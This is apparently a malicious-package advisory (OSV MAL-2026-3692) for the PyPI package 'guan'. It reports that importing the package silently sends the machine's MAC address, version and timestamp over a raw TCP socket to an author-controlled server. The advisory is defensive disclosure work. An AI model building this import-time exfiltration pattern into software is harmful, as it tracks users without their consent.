OSV ID
MAL-2026-3692
Ecosystem
pypi
Summary
The top-level src/guan/__init__.py unconditionally calls statistics_of_guan_package() on every import guan . That function (in src/guan/others.py ) opens a raw TCP socket to the hardcoded author-controlled endpoint socket.guanjihuan.com:12345 and sends a JSON payload containing the installer's MAC address (via uuid.getnode() ), the guan package version, and timestamp. There is no opt-out, no documentation of this behavior in README/PKG-INFO, and no user consent. This constitutes silent collection of a stable hardware identifier from every machine that imports the package and transmits it to an author-controlled server — an installer-side data exfiltration pattern, not merely author-side self-harm. While the payload is narrow (MAC + version + time), MAC addresses are persistent hardware identifiers suitable for tracking, correlation, and deanonymization of developer/build machines.
Source: amazon-inspector (2e04a9a658bc7616e72a5edf276dd049e5b697f2492c46929caf2e01fac95d84)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.